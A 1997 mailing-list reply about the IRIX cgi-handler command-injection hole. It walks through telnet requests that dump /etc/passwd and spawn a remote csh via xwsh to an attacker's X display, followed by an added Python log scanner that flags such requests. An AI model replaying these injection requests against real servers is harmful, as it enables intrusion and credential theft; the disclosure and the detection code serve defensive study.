Re: CPSR 7: IRIX WWW Server

Thomas Walter (balu@STUDST.FH-MUENSTER.DE)
Thu, 24 Jul 1997 17:51:56 +0200

Hiho...

[Corinne Posse Releases wrote]
> Quite a while ago, Razvan Dragomirescu (drazvan@kappa.ro) released a
> report on the default cgi-handler scripts that ship with IRIX systems
> with web servers, and some other web server programs. Just like with
> the phf bug, with the cgi-handler bug a malicious user could start
> an xterm from the server machine on their own system.
>
> Example:
>
> telnet www.highly.respectable.bank.com 80
> Trying 300.300.300.1...
> Connected to www.highly.respectable.bank.com
> Escape character is '^]'.
> GET /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=Download
>
> Please note the format of the "GET" query. The above assumes xwsh is
> in the PATH somewhere, and the "space" between "xwsh" and "-display"
> should be a TAB.

I had some problems while trying that...
First, it seems that xwsh was not in the path, so I tried to call
xwsh with a given path (note that all whitespace after GET
/cgi-bin/handler/ must be Tabs...):

enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/ ;/usr/sbin/xwsh -display enemy:0|?data=Download
UX:sh (sh): ERROR: Connection closed by foreign host.
enemy%

That opened the xwsh window... But there was only one error message in
the first line:

/usr/sbin/xwsh: Permission denied: can't start command

Hm - what could that be? Doesn't matter - let's see what I can do with
other commands... (Remember the tabs...)

enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/ ;cat /etc/passwd|?data=Download
UX:sh (sh): ERROR: root:x:0:0:Super-User:/:/bin/csh
sysadm:x:0:0:System V Administration:/usr/admin:/bin/sh
[... I won't give you that ;) ...]
nobody:x:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
[... and again some more ...]
Connection closed by foreign host.

Hm - a shadowed passwd... was my first thought... Let's see if I can get
the shadow... [As above] - Didn't work. So it seems that the WWW server
was not running as root (what a pity ;). If it does not run as root, it
usually runs as nobody. And what can we see above? nobody has the shell
/dev/null - that's why my xwsh was not able to start a command. Next try
was to give xwsh the command that it should start... (And again: Tabs! -
and of course everything on one line...)

enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/;/usr/sbin/xwsh -display enemy:0 -e
/bin/csh|?data=Download
UX:sh (sh): ERROR: Connection closed by foreign host.
enemy%

And voilà! - What else do you want? Any other programs to start? Just
try...

Brgds
Balu

--
                                                            /'^'\
Please note: English is not my mother tongue               ( o o )
-------------------------------------------------------oOOO--(_)--OOOo
E-Mail: balu@studst.fh-muenster.de
Snail Mail: Thomas Walter
            Wemhoefer Stiege 10a, 48565 Burgsteinfurt   .oooO
or          Broxtermannstr.12, 49082 Osnabrueck, GERMANY(   )   Oooo.
---------------------------------------------------------\ (----(   )-
                                                          \_)    ) /
                                                                (_/
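The post shows that the handler script passes the path component of the request straight to the shell, with ";" and "|" chaining commands and TAB separating arguments. As an added example (not part of the original message or of any IRIX software), the Python below scans constructed Common Log Format lines for requests to /cgi-bin/handler whose decoded path carries such shell metacharacters, so an administrator can find attempts of this kind in existing access logs. The log lines, hosts and timestamps are constructed; the WATCHED_PREFIXES list is an assumption to be extended with whatever CGI programs a given server exposes.

```python
import re
from urllib.parse import unquote

# Constructed Common Log Format lines (not from the original post). Line 1 carries
# the shell metacharacters percent-encoded; line 3 carries raw TAB characters,
# which some servers write into the log verbatim.
SAMPLE_LOG = [
    '1.2.3.4 - - [24/Jul/1997:17:51:56 +0200] "GET /cgi-bin/handler/%09;cat%09/etc/passwd|?data=Download HTTP/1.0" 200 1234',
    '5.6.7.8 - - [24/Jul/1997:17:52:10 +0200] "GET /cgi-bin/handler/report.html?data=Download HTTP/1.0" 200 512',
    '1.2.3.4 - - [24/Jul/1997:17:53:01 +0200] "GET /cgi-bin/handler/;/usr/sbin/xwsh\t-display\tenemy:0\t-e\t/bin/csh|?data=Download HTTP/1.0" 500 0',
    '9.9.9.9 - - [24/Jul/1997:17:54:00 +0200] "GET /index.html HTTP/1.0" 200 2048',
]

# Common Log Format. The request target is matched non-greedily so that raw
# whitespace inside it (as in line 3 above) does not break the parse.
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Characters that separate, chain or redirect commands once the path reaches
# /bin/sh. Whitespace is included because the post shows TAB acting as the
# argument separator.
SHELL_META = {';', '|', '&', '`', '$', '\t', '\n', ' ', '<', '>'}

# Script prefixes whose path component is known to reach a shell
# (assumption: extend with the CGI programs your own server exposes).
WATCHED_PREFIXES = ('/cgi-bin/handler',)


def parse_clf(line):
    """Return the named fields of one CLF line, or None if it does not parse."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def suspicious_chars(target):
    """Decode the request path and return the shell metacharacters it contains.

    Only the path part (before '?') is examined, because that is the part the
    handler script passes on; the query string is handled separately by it.
    """
    path = unquote(target.split('?', 1)[0])
    if not path.startswith(WATCHED_PREFIXES):
        return set()
    return {c for c in path if c in SHELL_META}


def scan_log(lines):
    """Return one finding per request whose watched path carries shell metacharacters."""
    findings = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None:
            continue
        bad = suspicious_chars(rec['target'])
        if bad:
            findings.append({'host': rec['host'], 'time': rec['time'],
                             'target': rec['target'], 'chars': sorted(bad)})
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} {f['target']!r} metachars={f['chars']}")
```

Running the module prints the two requests from host 1.2.3.4; the plain handler request and the request outside /cgi-bin are not reported. Decoding before matching matters: a request that arrives with %09 or %3B in the URL reaches the shell as a real TAB or semicolon, so a scan of the raw log text alone would miss it.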